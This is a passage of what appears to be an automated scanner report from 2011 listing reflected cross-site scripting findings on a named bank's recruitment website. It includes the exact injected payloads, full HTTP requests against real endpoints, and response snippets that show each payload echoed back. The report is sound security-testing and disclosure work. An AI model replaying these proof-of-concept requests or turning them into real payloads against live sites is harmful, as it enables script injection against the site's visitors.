1.56. http://www.mycreditagricole.jobs/exp_requirement_finance.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement_finance.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3db45"-alert(1)-"70d4da21c3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_requirement_finance.php?3db45"-alert(1)-"70d4da21c3e=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:47 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:47 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Finance
...[SNIP]...
itment Group";
var SharingBaseTitle = "Finance - Join us - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_requirement_finance.php?3db45"-alert(1)-"70d4da21c3e=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.57. http://www.mycreditagricole.jobs/exp_requirement_finance.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement_finance.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9914"><a>15f3d546172 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_requirement_finance.php?f9914"><a>15f3d546172=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:21 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:21 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Finance
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_requirement_finance.php?f9914"><a>15f3d546172=1" />
...[SNIP]...

1.58. http://www.mycreditagricole.jobs/exp_requirement_inspection.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement_inspection.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 385da"><a>7fd10c6424f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_requirement_inspection.php?385da"><a>7fd10c6424f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:21 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:21 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>General
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_requirement_inspection.php?385da"><a>7fd10c6424f=1" />
...[SNIP]...

1.59. http://www.mycreditagricole.jobs/exp_requirement_inspection.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement_inspection.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63451"-alert(1)-"76e9d0fafce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_requirement_inspection.php?63451"-alert(1)-"76e9d0fafce=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:48 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:48 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>General
...[SNIP]...
SharingBaseTitle = "General Inspection Group - Join us - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_requirement_inspection.php?63451"-alert(1)-"76e9d0fafce=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.60. http://www.mycreditagricole.jobs/exp_requirement_risk.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement_risk.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c0b5"-alert(1)-"8193ba56906 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_requirement_risk.php?9c0b5"-alert(1)-"8193ba56906=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:50 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:50 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Risk ma
...[SNIP]...
t Group";
var SharingBaseTitle = "Risk management - Join us - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_requirement_risk.php?9c0b5"-alert(1)-"8193ba56906=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.61. http://www.mycreditagricole.jobs/exp_requirement_risk.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement_risk.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 677ed"><a>8f879e6e437 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_requirement_risk.php?677ed"><a>8f879e6e437=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:23 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:23 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Risk ma
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_requirement_risk.php?677ed"><a>8f879e6e437=1" />
...[SNIP]...

1.62. http://www.mycreditagricole.jobs/exp_video_room.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2309"><a>ae8497ea27f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_video_room.php?e2309"><a>ae8497ea27f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:27 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:27 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_video_room.php?e2309"><a>ae8497ea27f=1" />
...[SNIP]...

1.63. http://www.mycreditagricole.jobs/exp_video_room.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c890e"-alert(1)-"f5e4008b30e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_video_room.php?c890e"-alert(1)-"f5e4008b30e=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:58 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:58 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
t Agricole Recruitment Group";
var SharingBaseTitle = "Video room - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_video_room.php?c890e"-alert(1)-"f5e4008b30e=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.64. http://www.mycreditagricole.jobs/experimentes.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /experimentes.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ce8b"><a>1145145393c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /experimentes.php?6ce8b"><a>1145145393c=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:11 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:11 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Espace
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/experimentes.php?6ce8b"><a>1145145393c=1" />
...[SNIP]...

1.65. http://www.mycreditagricole.jobs/experimentes.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /experimentes.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc415"-alert(1)-"c905a7da152 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /experimentes.php?dc415"-alert(1)-"c905a7da152=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:36 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:36 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Espace
...[SNIP]...
upe Cr..dit Agricole Recrutement";
var SharingBaseTitle = "Espace Exp..riment..s - Groupe Cr..dit Agricole Recrutement";
var SharingUrl = "http://www.recrutement.credit-agricole.com/experimentes.php?dc415"-alert(1)-"c905a7da152=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.66. http://www.mycreditagricole.jobs/faq.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /faq.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b3f"><a>b80953a4cb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /faq.php?25b3f"><a>b80953a4cb4=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:41 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:41 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 66243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>FAQ - C
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/faq.php?25b3f"><a>b80953a4cb4=1" />
...[SNIP]...

1.67. http://www.mycreditagricole.jobs/faq.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /faq.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94467"-alert(1)-"96e6996940f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /faq.php?94467"-alert(1)-"96e6996940f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:05:14 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:05:14 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 66264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>FAQ - C
...[SNIP]...
var SharingTitle = "FAQ - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "FAQ - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/faq.php?94467"-alert(1)-"96e6996940f=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.68. http://www.mycreditagricole.jobs/grad_campus_captains.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /grad_campus_captains.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4cc"-alert(1)-"a0f3d4c11a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /grad_campus_captains.php?6b4cc"-alert(1)-"a0f3d4c11a5=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:35 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:35 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>School
...[SNIP]...
ment Group";
var SharingBaseTitle = "School Captains - Campus - Graduates - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/grad_campus_captains.php?6b4cc"-alert(1)-"a0f3d4c11a5=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.69. http://www.mycreditagricole.jobs/grad_campus_captains.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /grad_campus_captains.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de376"><a>0e10001a2bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grad_campus_captains.php?de376"><a>0e10001a2bc=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:11 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:11 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>School
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/grad_campus_captains.php?de376"><a>0e10001a2bc=1" />
...[SNIP]...

1.70. http://www.mycreditagricole.jobs/grad_campus_forums.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /grad_campus_forums.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cec12"-alert(1)-"f67071f25e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /grad_campus_forums.php?cec12"-alert(1)-"f67071f25e0=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:43 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:43 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 98374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Forums
...[SNIP]...
ole Recruitment Group";
var SharingBaseTitle = "Forums - Campus - Graduates - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/grad_campus_forums.php?cec12"-alert(1)-"f67071f25e0=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.71. http://www.mycreditagricole.jobs/grad_campus_forums.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /grad_campus_forums.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73a48"><a>722a78de38f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grad_campus_forums.php?73a48"><a>722a78de38f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:07 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:07 GMT; path=/
